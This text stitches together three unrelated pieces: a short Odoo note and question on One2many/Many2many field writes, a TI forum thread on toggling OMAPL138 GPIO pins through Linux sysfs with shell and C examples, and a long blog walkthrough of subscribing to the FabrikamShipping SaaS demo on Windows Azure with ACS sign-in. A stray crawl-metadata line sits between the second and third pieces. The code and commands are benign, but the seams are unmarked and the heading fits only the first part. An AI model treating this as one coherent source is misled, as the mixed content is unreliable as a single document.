Let’s leave Adam for a moment and follow a few clicks of Joe's mouse. If you recall the subscription process, you'll remember that Adam defined two users: himself and Joe. Joe is on Gmail: let's take a look at what he got. If you are doing this from the same machine as before, remember to close all browsers or you risk carrying forward existing authentication sessions!
Joe is “just” a user, hence he received only the user activation email.
The mail is analogous to the activation mail received by Adam: the only differences are the activation link, specific to Joe's profile, and how Gmail renders HTML mails.
Let’s follow the activation link.
Joe gets the same sign-up UI we observed with Adam: but this time Joe has a Gmail account, hence we'll pick the Google option.
ACS connects with Google via the OpenID protocol: the UI above is what Google shows you when an application (in this case the ACS endpoint used by FabrikamShipping) requests an attribute exchange transaction, so that Joe can give or refuse his consent to the exchange. Of course Joe knows that the app is trusted, as he got a heads-up from Adam, and he gives his consent. This will cause a token to flow to ACS, which will transform it and make it available for the browser to authenticate with FabrikamShipping. From now on, we already know what will happen: the token will be matched with the profile connected to this activation page, a link will be established and the ticket will be voided. Joe has just joined Contoso7's FabrikamShipping instance family!
And now, same drill as before: in order to access the instance, all Joe needs to do is click on the link above or use the link in the notification (better to bookmark it).
Joe picks Google as his IP…
...and since he flagged "remember this approval" at sign-up time, he'll just see the page above flash briefly in the browser and get authenticated without further clicks.
And here we are! Joe is logged into the Contoso7 instance of FabrikamShipping.
As you can see in the upper right corner, his role is Shipping Creator, as assigned by Adam at subscription time. That means that he can create new shipments, but he cannot modify existing ones. If you want to double-check that, just go through the shipment creation wizard, verify that it works and then try to modify the newly created shipment: you'll see that the first operation will succeed, and the second will fail. Close the browser, reopen the Contoso7 instance, sign in again as Adam and verify that you are instead able to do both creation and modification. Of course the main SaaS explanatory value of this demo is in the provisioning rather than the application itself, but it's nice to know that the instances themselves actually use the claims as well.
Aaand that’s it for creating and consuming Small Business edition instances. Seems long? Well, it takes long to write it down: but with a good form filler, I can do the entire demo walkthrough above in well under 3 minutes. Also: this is just one of the possible paths, but you can add your own spins & variations (for example, I am sure that a lot of people will want to try using Facebook). The source code is fully available, hence if you want to add new identity providers (Yahoo!, ADFS instances or arbitrary OpenID providers are all super-easy to add) you can definitely have fun with it.
Now that you have seen the flow from the customer perspective, in one of the next installments we'll take a look at some of the inner workings of our implementation: but now… it's Saturday night, and I'd better leave the PC alone before they come to grab my hair and drag me away from it
| https://blogs.msdn.microsoft.com/vbertocci/2011/02/12/fun-with-fabrikamshipping-saas-i-creating-a-small-business-edition-instance/ | CC-MAIN-2018-34 | refinedweb | 2,974 | 53.85 |
Hi,
the problem:
method paragraph returns paragraph + system_messages
Replace.run checks that only one paragraph is returned
otherwise error("may contain a single paragraph only") is returned
problem 1:
paragraph returns content and system_messages in one list
problem 2:
directive.run returns either content or system_messages
usecase 1:
English roles work as a fallback if the language is different,
but two system_messages are generated in the process:
1. role not found
2. fallback role used
in this case the content itself becomes correct, but the system_messages
break it
usecase 2:
errors in directives get an additional error("may contain a single
paragraph only")
the change ::
class Replace(Directive):

    has_content = True

    def run(self):
        if not isinstance(self.state, states.SubstitutionDef):
            raise self.error(
                'Invalid context: the "%s" directive can only be used within '
                'a substitution definition.' % self.name)
        self.assert_has_content()
        text = '\n'.join(self.content)
        element = nodes.Element(text)
        self.state.nested_parse(self.content, self.content_offset,
                                element)
        # BUG 1830380 : element might contain [paragraph] + system_message(s)
        # BUG 1830380 : could skip embedded messages, but then we lose them
-        if ( len(element) != 1
-             or not isinstance(element[0], nodes.paragraph)):
-            messages = []
-            for node in element:
-                if isinstance(node, nodes.system_message):
-                    node['backrefs'] = []
-                    messages.append(node)
-            error = self.state_machine.reporter.error(
-                'Error in "%s" directive: may contain a single paragraph '
-                'only.' % (self.name), line=self.lineno)
-            messages.append(error)
-            return messages
-        else:
-            return element[0].children
+        node = None
+        messages = []
+        for elem in element:
+            if not node and isinstance(elem, nodes.paragraph):
+                node = elem
+            elif isinstance(elem, nodes.system_message):
+                elem['backrefs'] = []
+                messages.append(elem)
+            else:
+                return [
+                    self.state_machine.reporter.error(
+                        'Error in "%s" directive: may contain a single '
+                        'paragraph only.' % (self.name), line=self.lineno)]
+        if node:
+            return node.children
+        return messages
changes the behaviour to
usecase 1::
-: expected
+: output
<document source="test data">
<paragraph>
Test directive containing english role superscript.
BUG 1830380: the ERROR is an ERROR and the WARNING a followup to the ERROR
+ <substitution_definition names="Na+">
+ Na
+ <superscript>
+ +
- <system_message level="1" line="4" source="test data" type="INFO">
- <paragraph>
- No role entry for "sup" in module "docutils.parsers.rst.languages.fr".
- Using English fallback for role "sup".
- <system_message level="3" line="4" source="test data" type="ERROR">
- <paragraph>
- Error in "remplace" directive: may contain a single
paragraph only.
- <system_message level="2" line="4" source="test data" type="WARNING">
- <paragraph>
- Substitution definition "Na+" empty or invalid.
- <literal_block xml:
- .. |Na+| remplace:: Na\ :sup:`+`
<paragraph>
Le
<substitution_reference refname="Na+">
Na+
est l'ion sodium.
means we get rid of the ERROR, but we also lose the INFO and WARNING
usecase 2:
-: expected
+: output
<document source="test data">
- <system_message ids="id1" level="2" line="1" source="test data" type="WARNING">
- <paragraph>
- Inline emphasis start-string without end-string.
- <system_message ids="id3" level="2" line="1" source="test data" type="WARNING">
- <paragraph>
- Inline strong start-string without end-string.
- <system_message ids="id5" level="2" line="1" source="test data" type="WARNING">
- <paragraph>
- Inline literal start-string without end-string.
<system_message level="3" line="1" source="test data" type="ERROR">
<paragraph>
- Error in "replace" directive: may contain a single paragraph only.
- <system_message level="2" line="1" source="test data" type="WARNING">
- <paragraph>
- Substitution definition "name" empty or invalid.
+ Substitution definition contains illegal element:
+ <literal_block xml:
+ <problematic ids="id2" refid="id1">
+ *
<literal_block xml:
.. |name| replace:: *error in **inline ``markup
means we get a better ERROR, but lose information details
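For what it's worth, the filtering logic of the proposed patch can be exercised in isolation with stand-in node classes (plain Python, no docutils required); note how collected messages are dropped whenever a paragraph is present, which matches the lost INFO and WARNING noted above:

```python
class paragraph(object):
    """Stand-in for docutils.nodes.paragraph."""
    def __init__(self, *children):
        self.children = list(children)

class system_message(object):
    """Stand-in for docutils.nodes.system_message."""
    def __init__(self, level):
        self.level = level

def filter_element(element):
    """Mirror of the patched Replace.run: accept one paragraph plus any
    number of system_messages; anything else is a hard error. When a
    paragraph is present, the collected messages are silently dropped."""
    node, messages = None, []
    for elem in element:
        if node is None and isinstance(elem, paragraph):
            node = elem
        elif isinstance(elem, system_message):
            messages.append(elem)
        else:
            return 'error: may contain a single paragraph only'
    return node.children if node is not None else messages
```

The three outcomes are: children of the single paragraph (messages lost), the messages alone when no paragraph parsed, or the hard error for anything else.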
Any help?
--
Hello,
in docutils/parsers/rst/__init__.py there is a class DirectiveError(Exception);
shouldn't reporter.error (and the like) be used instead?
cheers
--
Hi Günter!
Last week (8 days ago) Guenter Milde wrote:
>> 3 days ago Guenter Milde wrote:
> I suppose the problem are "implicit" unicode -> str conversions that
> use the "ASCII, strict" encoding.
I thought that, too. But some tests on the command line showed this is
not the case. It's really the `print` which causes the problem.
Probably it's there where there is the conversion to ASCII which
fails.
> But maybe it is also the conversion in the join()
Unfortunately not.
> On 2011-04-16, Stefan Merten wrote:
>> Yes, I still have LANG=C...
>
>()
Doesn't change anything.
>>.
Then it could be removed.
If, however, people insist on using `sys.stderr` then may be it could
be wrapped?
>> Here are the hits
>> for `sys.stderr` in some core sources::
>
> ...
>
>> I guess all these places need to be fixed :-( .
>
> I am not sure. At least in case there is a pure ASCII string, nothing
> needs to be done.
True.
> Things change with substitutions that include
> parts of the document (which is generally an unicode object).
Yes.
> It would be wonderful, if you could prepare test cases for the Docutils
> test suite.
Good idea. I'm going to check whether I find my way through the tests.
Hints where to put this type of test to are welcome, however.
Grüße
Stefan
Bugs item #1830380, was opened at 2007-11-12 13:01 by lpezard (lpezard)
Assigned to: Nobody/Anonymous (nobody)
Summary: Replace with role :sup: does not work with language_code: fr
Initial Comment:
Here is my original posting to docutils-user mailing list and David Goodger reply:
My posting:
-----------
I've tried the following replacements:
.. |Na+| replace:: Na\ :sup:`+`
Le |Na+| est l'ion sodium.
.. |K+| replace:: K\ :sup:`+`
Le |K+| est l'ion potassium
everything works fine if I leave the language_code at en, but obviously this is French, so I change my docutils.conf to language_code: fr and then I obtain the following error:
test.txt:5: (ERROR/3) Error in "replace" directive: may contain a single paragraph only.
test.txt:5: (WARNING/2) Substitution definition "Na+" empty or invalid.
.. |Na+| replace:: Na\ :sup:`+`
test.txt:7: (ERROR/3) Undefined substitution referenced: "Na+".
It does not work for the first replacement |Na+| but works as expected for the second one |K+|. I must admit that I don't understand.
David Goodger's reply:
----------------------
I don't understand why the first replacement gives an error while the second one doesn't, either. But I found the root cause: Docutils isn't finding the role "sup", because it expects the French "exp" or
"exposant". If you're going to be using the French variant of Docutils, you should be using the French directive & role names too:
.. |Na+| remplace:: Na\ :exp:`+`
Le |Na+| est l'ion sodium.
.. |K+| remplace:: K\ :exp:`+`
Le |K+| est l'ion potassium
This works fine; no errors. For a "dictionary" of equivalencies, see . I don't know if these are documented somewhere else (they ought to be).
I don't understand, yet, why there's an error at all. There shouldn't be. The English directive names & role names should be fallback defaults. But I don't have time to solve it now.
Please file a bug on SourceForge so this doesn't get lost. Please include:
"A secondary bug is that an error in the "replace" directive isn't propagating through to the substitution definition error reporting."
----------------------------------------------------------------------
>Comment By: engelbert gruber (grubert)
Date: 2011-04-25 13:43
my reconstruction is:
with language!=en and reST:
.. |X| replace:: \ :sup:`x`
in class Replace: the call to nested_parse returns [paragraph] +
system_message(s)
which results in the error may contain a single paragraph only.
I flagged some lines with "# BUG 1830380"
but still do not know how to fix it AND pass system_messages to Replace.run's
caller.
----------------------------------------------------------------------
You can respond by visiting:
On 2011-04-20, Arfrever Frehtes Taifersar Arahesis wrote:
> Users of some locales (e.g. cs_CZ.UTF-8) have been reproducing some problems with docutils and Python 2:
>
Can you please test, if this problem persists with the newest SVN
version or daily snapshot?
Error string encoding has been made more robust some days ago.
Günter
Dear list,
I cannot find documentation (nor the place in the source) explaining
the config file syntax for *list values* as expected, e.g. here:
_`strip_classes`
List of "classes" attribute values to remove from all elements in
the document tree.
.. WARNING:: Potentially dangerous; use with caution.
Default: disabled (None). Option: ``--strip-class``.
_`strip_elements_with_classes`
List of "classes" attribute values; matching elements to be
removed from the document tree.
.. WARNING:: Potentially dangerous; use with caution.
Default: disabled (None). Option: ``--strip-element-with-class``.
Can someone please give an example?
Günter
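For what it's worth, my understanding (an assumption from memory, not authoritative documentation) is that list settings in a docutils configuration file are given as comma-separated values on one line, with hyphens in the entry names, e.g.:

```ini
; assumed syntax -- please verify against the docutils config docs
[general]
strip-classes: ham, eggs
strip-elements-with-classes: spam
```

If that reading is wrong, the validator functions in docutils/frontend.py are the place to check.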
07.03.2011 18:35, Paul Bukhovko wrote:
> On Wed, Dec 22, 2010 at 05:11, PC <by.marcis@...> wrote:
>> 17.11.2010 19:41, Paul Bukhovko wrote:
>>>
>>> 11.11.2010 17:38, David Goodger wrote:
>>>>
>>>> On Thu, Nov 11, 2010 at 05:19, Paul Bukhovko<bukhovko@...> wrote:
>>>>>
>>>>> I want to translate 'Docutils' project page
>>>>> () to Belorussian language.
>>>>
>>>> I don't mind at all. Please go ahead.
>>>>
>>>>> Do you prefer email or IM for contact (if any questions regarding the
>>>>> translation arise)? What instant messaging client (if any) do you
>>>>> use? AIM,
>>>>> MSN, Sk.
>>>>
>>>
>>> Hi David,
>>>
>>> Was a pleasure to translate this page!
>>>
>>> Posted my Belorussian translation on
>>>. If you don't mind can you
>>> publish a tiny link with a text
>>>
>>> <a href="">Belorussian</a>
>>> or whatever you feel is right.
>
> I'm happy to see translations and localization. But I'm always busy.
> Who isn't? ;-)
>
> As I wrote.
>
> Please write to docutils-develop@..., where you'll probably
> get quicker action.
>
Greetings,
Can I ask you for a favor? Please place a tiny link back to the
translation; it does not matter where on the page. Not being able to
announce it otherwise, I ask you to link back to the translation to
spread the good news around the globe. If not completely contrary to
your principles and linking habits :)
--
Regards,
Paul Bukhovko
On 2011-04-18, Dave Kuhlman wrote:
> (1) Does this patch have the effect,
> under Python 3.2, of generating an .odt file containing unicode
> strings?
> (2) If so, wouldn't we actually want utf-8 as the encoding? Or does
> oowriter actually understand unicode?
Python 3 uses the `unicode` object for "generic" strings internally,
allowing encoding-independent representation of all Unicode characters.
Docutils uses `unicode` internally as well - but under Python 2 it needs
to explicitely decode things it reads and encode when writing (to disk or
stdout).
So no, this patch does not change the behaviour that the encoding of the
output file is governed by the config setting
output_encoding
The text encoding for output.
(see docutils/docs/user/config.html).
Günter
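The decode-on-input / encode-on-output discipline described above can be sketched in a few lines (Python 3 shown, where str plays the role of Python 2's unicode object):

```python
def read_source(raw_bytes, encoding="utf-8"):
    # decode exactly once, at the input boundary
    return raw_bytes.decode(encoding)

def write_output(text, encoding="utf-8"):
    # encode exactly once, at the output boundary
    return text.encode(encoding)

# everything in between operates on str (unicode) only
doc = read_source("äöü".encode("utf-8"))
out = write_output(doc.upper())
```

The point is that the chosen `output_encoding` only matters at the very last step; all internal processing is encoding-independent.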
----- Original Message ----
> From: Arfrever Frehtes Taifersar Arahesis <arfrever.fta@...>
> To: Docutils Development <docutils-develop@...>
> Sent: Sat, April 9, 2011 4:22:48 PM
> Subject: [Docutils-develop] [PATCH] Support Python 3.2 in
>docutils/writers/odf_odt/__init__.py
>
> I'm attaching the patch, which adds support for Python 3.2 in
>docutils/writers/odf_odt/__init__.py.
> This patch is needed independently from the configparser-related patch.
>
>
>
>
> --
> Arfrever Frehtes Taifersar Arahesis
>
Arfrever -
I've applied your patch and checked it into the SVN repository.
Thank you.
However a question or two:
(1) Does this patch have the effect,
under Python 3.2, of generating an .odt file containing unicode
strings?
(2) If so, wouldn't we actually want utf-8 as the encoding? Or does
oowriter actually understand unicode?
I apologize that I do not understand the use of unicode in
Python 3 very well. I have a minimal understanding of
unicode and encodings even in Python 2.
- Dave
--
Dave Kuhlman
> position 0: ordinal not in range(128)
> >>> sys.stderr.encoding
> 'ANSI_X3.4-1968'
> Yes, I still have LANG=C....
>
Hi Günter!
Thanks for caring about this.
3 days ago Guenter Milde wrote:
> On 2011-04-04, Stefan Merten wrote:
>
>> The command ::
>
>> rst2xml.py --debug --traceback --input-encoding=utf-8 --output-encoding=utf-8 --error-encoding=utf-8 umlaut.rst /dev/null
>
>> on input file `umlaut.rst` ::
>
>> äöüÄÖÜß
>
>> crashes with a misleading error message::
>
> Actually, this is a Python bug. It should be fine with Python >= 2.6
I don't think so - at least not the last part::
$ python -V
Python 2.6.5
$ svn info
URL: svn+ssh://smerten@.../svnroot/repos/docutils/trunk
...
Revision: 6993
...
Last Changed Rev: 6993
Last Changed Date: 2011-03-20 18:20:36 +0100 (Sun, 20 Mar 2011)
crashes. This is before your patch but with Python 2.6.5.
> and with the workaround I commited yesterday:
Trial::
$ svn update
...
Updated to revision 7012.
Also crashes::
File "/home/stefan/lib/python/lib/docutils/docutils/statemachine.py", line 212, in run
% (self.line_offset, '\n| '.join(self.input_lines)))
UnicodeEncodeError: 'ascii' codec can't encode characters in position 51-57: ordinal not in range(128)
> Can you please test?
Done.
I think the problem is not in the Python problem you mentioned but in
the code at `docutils/docutils/statemachine.py:212`::
print >>sys.stderr, (
'\nStateMachine.run: input_lines (line_offset=%s):\n| %s'
% (self.line_offset, '\n| '.join(self.input_lines)))
IMHO the print statement causes the problem::
$ python
Python 2.6.5 (r265:79063, Apr 16 2010, 13:09:56)
position 0: ordinal not in range(128)
>>> sys.stderr.encoding
'ANSI_X3.4-1968'
Yes, I still have LANG=C...
With all the logging facilities Docutils has I guess it would be
feasible to use them instead of printing things simply out to
`sys.stderr`. However, this idiom is quite common. Here are the hits
for `sys.stderr` in some core sources::
./docutils/core.py:238: print >>sys.stderr, '\n::: Runtime settings:'
./docutils/core.py:239: print >>sys.stderr, pprint.pformat(self.settings.__dict__)
./docutils/core.py:241: print >>sys.stderr, '\n::: Document internals:'
./docutils/core.py:242: print >>sys.stderr, pprint.pformat(self.document.__dict__)
./docutils/core.py:244: print >>sys.stderr, '\n::: Transforms applied:'
./docutils/core.py:245: print >>sys.stderr, (' (priority, transform class, '
./docutils/core.py:247: print >>sys.stderr, pprint.pformat(
./docutils/core.py:253: print >>sys.stderr, '\n::: Pseudo-XML:'
./docutils/core.py:254: print >>sys.stderr, self.document.pformat().encode(
./docutils/core.py:263: print >>sys.stderr, '%s: %s' % (error.__class__.__name__, error)
./docutils/core.py:264: print >>sys.stderr, ("""\
./docutils/core.py:273: print >>sys.stderr, ('Exiting due to level-%s (%s) system message.'
./docutils/core.py:279: sys.stderr.write(
./docutils/frontend.py:323: default_error_encoding = sys.stderr.encoding or 'ascii'
./docutils/frontend.py:713: sys.stderr.write(self.not_utf8_error % (filename, filename))
./docutils/utils.py:85: `None` (implies `sys.stderr`; default).
./docutils/utils.py:108: stream = sys.stderr
./docutils/utils.py:143: stream = sys.stderr
./docutils/statemachine.py:210: print >>sys.stderr, (
./docutils/statemachine.py:218: print >>sys.stderr, ('\nStateMachine.run: bof transition')
./docutils/statemachine.py:228: print >>sys.stderr, (
./docutils/statemachine.py:236: print >>sys.stderr, (
./docutils/statemachine.py:248: print >>sys.stderr, (
./docutils/statemachine.py:261: print >>sys.stderr, (
./docutils/statemachine.py:285: print >>sys.stderr, \
./docutils/statemachine.py:442: print >>sys.stderr, (
./docutils/statemachine.py:450: print >>sys.stderr, (
./docutils/statemachine.py:457: print >>sys.stderr, (
./docutils/statemachine.py:491: print >>sys.stderr, '%s: %s' % (type, value)
./docutils/statemachine.py:492: print >>sys.stderr, 'input line %s' % (self.abs_line_number())
./docutils/statemachine.py:493: print >>sys.stderr, ('module %s, line %s, function %s'
./docutils/io.py:238: print >>sys.stderr, '%s: %s' % (error.__class__.__name__,
./docutils/io.py:240: print >>sys.stderr, ('Unable to open source file for '
./docutils/io.py:330: print >>sys.stderr, '%s: %s' % (error.__class__.__name__,
./docutils/io.py:332: print >>sys.stderr, ('Unable to open destination file for writing'
./docutils/io.py:370: print >>sys.stderr, '%s: %s' % (error.__class__.__name__,
./docutils/io.py:372: print >>sys.stderr, ('Unable to open destination file for writing '
I guess all these places need to be fixed :-( .
Grüße
Stefan
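For illustration only (Python 3 syntax, while the code under discussion is Python 2): one way to make such diagnostics robust is to funnel them through a single helper that encodes with a lossless error handler instead of trusting the stream's locale-derived encoding:

```python
import sys

def safe_write(stream, text, fallback_encoding="utf-8"):
    """Write unicode text to a possibly ASCII-only stream without
    crashing: unencodable characters are backslash-escaped."""
    encoding = getattr(stream, "encoding", None) or fallback_encoding
    data = text.encode(encoding, "backslashreplace")
    # hand a str back to .write() by round-tripping through the same codec
    stream.write(data.decode(encoding))

safe_write(sys.stderr, "StateMachine.run: input_lines: äöü\n")
```

On an ASCII-only stderr (LANG=C) the umlauts come out as `\xe4\xf6\xfc` instead of raising UnicodeEncodeError; on a UTF-8 stream they pass through unchanged.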
On 2011-04-14, Ryan Krauss wrote:
> from docutils.math import unimathsymbols2tex
> ImportError: cannot import name unimathsymbols2tex
> I just checked out the trunk. Should unimathsymbols2tex.py be in the
> trunk?
It should be. And it now is. Please excuse, it was late last night.
Thanks for reporting
Günter
I don't see unimathsymbols2tex.py in this directory:
On Thu, Apr 14, 2011 at 9:36 AM, Ryan Krauss <ryanlists@...> wrote:
>
On 2011-04-04, Stefan Merten wrote:
> The command ::
> rst2xml.py --debug --traceback --input-encoding=utf-8 --output-encoding=utf-8 --error-encoding=utf-8 umlaut.rst /dev/null
> on input file `umlaut.rst` ::
> äöüÄÖÜß
> :-( .
Actually, this is a Python bug. It should be fine with Python >= 2.6
and with the workaround I commited yesterday:
- Work around Issue2517_ to allow unicode messages in `Exception`
instances with Python < 2.6.
.. _Issue2517:
Can you please test?
Günter
Hi!
The command ::
rst2xml.py --debug --traceback --input-encoding=utf-8 --output-encoding=utf-8 --error-encoding=utf-8 umlaut.rst /dev/null
on input file `umlaut.rst` ::
äöüÄÖÜß" :-( .
Grüße
Stefan
Bugs item #3149845, was opened at 2011-01-02 13:22
Message generated for change (Comment added) made by abadger1999
Category: None
Group: None
Status: Open
Resolution: None
Priority: 5
Private: No
Submitted By: Toshio Kuratomi (abadger1999)
Assigned to: Nobody/Anonymous (nobody)
Summary: docutils broken on python-3.2 due to configparser changes
Initial Comment:
Python-3.2 replaces ConfigParser with SafeConfigParser. One of the ramifications of this is that the code now checks that any value set() on ConfigParser is a string. This leads to tracebacks like this from running the unittests:
======================================================================
ERROR: test_odt_tables1 (test_writers.test_odt.DocutilsOdtTestCase)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/test/test_writers/test_odt.py", line 156, in test_odt_tables1
self.process_test('odt_tables1.txt', 'odt_tables1.odt',
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/test/test_writers/test_odt.py", line 104, in process_test
settings_overrides=settings_overrides)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 393, in publish_string
enable_exit_status=enable_exit_status)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 638, in publish_programmatically
settings_spec, settings_overrides, config_section)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 139, in process_programmatic_settings
**defaults)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 126, in get_settings
usage, description, settings_spec, config_section, **defaults)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 113, in setup_option_parser
usage=usage, description=description)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 534, in __init__
config_settings = self.get_standard_config_settings()
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 593, in get_standard_config_settings
settings.update(self.get_config_file_settings(filename), self)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 599, in get_config_file_settings
parser.read(config_file, self)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 714, in read
self.validate_settings(filename, option_parser)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 757, in validate_settings
self.set(section, setting, new_value)
File "/usr/lib64/python3.2/configparser.py", line 1157, in set
self._validate_value_types(option=option, value=value)
File "/usr/lib64/python3.2/configparser.py", line 1146, in _validate_value_types
raise TypeError("option values must be strings")
TypeError: option values must be strings
I'll attach the complete build log with all the tracebacks.
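For illustration only (this is not the patch from this thread): the stricter type check can be reproduced, and worked around by coercing values to str before calling set(), roughly like this:

```python
import configparser

def set_setting(parser, section, option, value):
    """Store a possibly non-string value by coercing it to str first,
    which satisfies the type check added to configparser in Python 3.2."""
    if not parser.has_section(section):
        parser.add_section(section)
    parser.set(section, option, str(value))

cp = configparser.ConfigParser()
cp.add_section('general')
try:
    cp.set('general', 'tab_width', 4)        # non-string value: raises TypeError
except TypeError as e:
    print('rejected:', e)

set_setting(cp, 'general', 'tab_width', 4)   # coerced: stored as the string '4'
print(cp.get('general', 'tab_width'))
```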
----------------------------------------------------------------------
>Comment By: Toshio Kuratomi (abadger1999)
Date: 2011-04-04 12:11
I've tried this patch to workaround the configparser changes. It's... not
ideal because it simply ports to using RawConfigParser (which accepts
non-strings) rather than changing docutils to use string values everywhere.
This gets me to a new error in Elementtree which I'm trying to diagnose --
will open a new bug on that after we get something.
----------------------------------------------------------------------
Comment By: Georg Brandl (gbrandl)
Date: 2011-02-12 02:24
I had spoken with him and he wanted to add his feedback himself; the gist
of it was that he considers storing non-strings an abuse of the
configparser.
----------------------------------------------------------------------
Comment By: Toshio Kuratomi (abadger1999)
Date: 2011-02-11 13:50
Any word from the configparser maintainer? Seems like we've gotten late
enough in the py-3.2 cycle that we might have a de facto answer....
----------------------------------------------------------------------
Comment By: Georg Brandl (gbrandl)
Date: 2011-01-02 17:45
I'll forward this to the configparser maintainer, to clarify if this
incompatibility is acceptable for 3 | https://sourceforge.net/p/docutils/mailman/docutils-develop/?viewmonth=201104 | CC-MAIN-2016-50 | refinedweb | 3,392 | 53.27 |
What are people's experiences with any of the Git modules for Python? (I know of GitPython, PyGit, and Dulwich - feel free to mention others if you know of them.)
I am writing a program which will have to interact (add, delete, commit) with a Git repository, but have no experience with Git, so one of the things I'm looking for is ease of use/understanding with regards to Git.
The other things I'm primarily interested in are maturity and completeness of the library, a reasonable lack of bugs, continued development, and helpfulness of the documentation and developers.
If you think of something else I might want/need to know, please feel free to mention it.
I thought I would answer my own question, since I'm taking a different path than suggested in the answers. Nonetheless, thanks to those who answered.
First, a brief synopsis of my experiences with GitPython, PyGit, and Dulwich:
Also, StGit looks interesting, but I would need the functionality extracted into a separate module and do not want to wait for that to happen right now.
In (much) less time than I spent trying to get the three modules above working, I managed to get git commands working via the subprocess module, e.g.
def gitAdd(fileName, repoDir):
    cmd = ['git', 'add', fileName]
    p = subprocess.Popen(cmd, cwd=repoDir)
    p.wait()

gitAdd('exampleFile.txt', '/usr/local/example_git_repo_dir')
This isn't fully incorporated into my program yet, but I'm not anticipating a problem, except maybe speed (since I'll be processing hundreds or even thousands of files at times).
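On the speed concern: most of the per-file cost is subprocess startup, so one possible mitigation (my own sketch, not part of the original answer) is to batch many paths into a single `git add` call:

```python
import subprocess

def chunks(items, n):
    """Split a list into batches of at most n items."""
    return [items[i:i + n] for i in range(0, len(items), n)]

def gitAddMany(fileNames, repoDir, batchSize=100):
    """Stage many files with one subprocess per batch instead of one per file."""
    for batch in chunks(fileNames, batchSize):
        p = subprocess.Popen(['git', 'add', '--'] + batch, cwd=repoDir)
        p.wait()
        if p.returncode != 0:
            raise RuntimeError('git add failed for batch starting at %s' % batch[0])
```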
Maybe I just didn't have the patience to get things going with Dulwich or GitPython. That said, I'm hopeful the modules will get more development and be more useful soon.
While this question was asked a while ago and I don't know the state of the libraries at that point, it is worth mentioning for searchers that GitPython does a good job of abstracting the command line tools so that you don't need to use subprocess. There are some useful built in abstractions that you can use, but for everything else you can do things like:
import git
repo = git.Repo('/home/me/repodir')
print repo.git.status()
# checkout and track a remote branch
print repo.git.checkout('origin/somebranch', b='somebranch')
# add a file
print repo.git.add('somefile')
# commit
print repo.git.commit(m='my commit message')
# now we are one commit ahead
print repo.git.status()
Everything else in GitPython just makes it easier to navigate. I'm fairly well satisfied with this library and appreciate that it is a wrapper on the underlying git tools.
UPDATE: I've switched to using the sh module for not just git but most commandline utilities I need in python. To replicate the above I would do this instead:
import sh
git = sh.git.bake(_cwd='/home/me/repodir')
print git.status()
# checkout and track a remote branch
print git.checkout('-b', 'somebranch')
# add a file
print git.add('somefile')
# commit
print git.commit(m='my commit message')
# now we are one commit ahead
print git.status()
I was going through a code where I encountered some problem and was able to crack this piece of code:
#include <iostream>
#include <stdint.h>
#include <unistd.h>
#include <errno.h>
#include <vector>
#include <sys/types.h>

using namespace std;

class abc {
public:
    abc(int x, int y) {
        cout << "x:" << x << endl;
        cout << "y:" << y << endl;
    }
    virtual ~abc() {}
    enum example {
        a = 1,
        b = 2,
        c = 3,
        d = 4
    };
};

template<typename T>
class xyz {
public:
    void some_func(abc *a) {
        cout << "some_func called" << endl;
    }
};

int main() {}
I want to call the function some_func() from main(). How should I do that? Can somebody help me with this?
In-app Payments with mozPay
Marketplace feature removal
The functionality described on this page no longer works — Firefox Marketplace has discontinued support for Android, Desktop, Tablets, and payments (and other related functionality). For more information, read the Future of Marketplace FAQ.
The navigator.mozPay API enables web pages to take payment for digital goods. This article explains how to use the navigator.mozPay API and Web Payment Provider services to process in-app payments.
Overview
Here is an overview of how you add in-app payments to your app and process a transaction:
- Log in to the Firefox Marketplace Developer Hub.
- Upload an app, set it up as paid/in-app, and generate an Application Key and an Application Secret.
- From your app, initiate a payment by signing a JWT request with your secret and calling navigator.mozPay(...).
- This starts a payment flow in a new window
- The buyer logs in with their email address.
- The buyer enters their PIN.
- The buyer charges the purchase to their phone bill or credit card.
- Your app receives a JavaScript callback when the buyer closes the window.
- Your app server receives a signed POST request with a Mozilla transaction ID indicating that the purchase was completed.
- If the transaction succeeded, you receive money directly deposited to your bank account
The navigator.mozPay API is currently only available on Firefox OS. You can test it with the Firefox OS Simulator.
Process an in-app payment: step by step
This section explains how set up an in-app payment for testing and production.
Obtain a payment key for testing
When you log into the Firefox Marketplace Developer Hub you can visit the In-App Payment Keys page to generate an Application Key and Application Secret for testing. This key will only allow you to simulate in-app payments but this is suitable for testing. You should try out some simulations before you submit your app for review to the Marketplace. Read on for instructions on how to simulate a payment.
Obtain a real payment key
When you submit your working app to the Firefox Marketplace Developer Hub you will be prompted to configure payments. Select the cost of your app (typically free in this case) then mark the option to accept in-app payments. After setting up your bank account details, visit the In-App Payments page to obtain an Application Key and Application Secret for making real payments.
Store the Application Secret securely on your app server in a private settings file or something like that.
Set up an application
Let's say you are building an adventure game web app and you want to offer a Magical Unicorn for purchase so that players can excel in the game. You want to charge $1.99 or €1.89 or whatever the user's preferred currency is. In the following sections you'll see how to set up a backend server and write frontend code to use navigator.mozPay to sell products.
Set up your server to sign JWTs
A payment is initiated with a JSON Web Token (JWT) and it must be created server side, not client side. This is because the secret key used for signing should never be publicly accessible. Continuing with the example of selling a Magical Unicorn for an adventure game, create a URL on your server like /sign-jwt. This should create a JSON object that defines the product name, the price point, etc. Consult the Web Payment API spec for complete documentation on the JWT format. Here is an example:

{
  "aud": "marketplace.mozilla.org",
  "iss": "APP-123",
  "request": {
    "currency": "USD",
    "price": "0.99",
    "name": "Virtual 3D Glasses",
    "productdata": "ABC123_DEF456_GHI_789.XYZ",
    "description": "Virtual 3D Glasses"
  },
  "exp": "2012-03-21T11:09:56.753141",
  "iat": "2012-03-21T10:09:56.810420",
  "typ": "mozilla/payments/pay/v1"
}
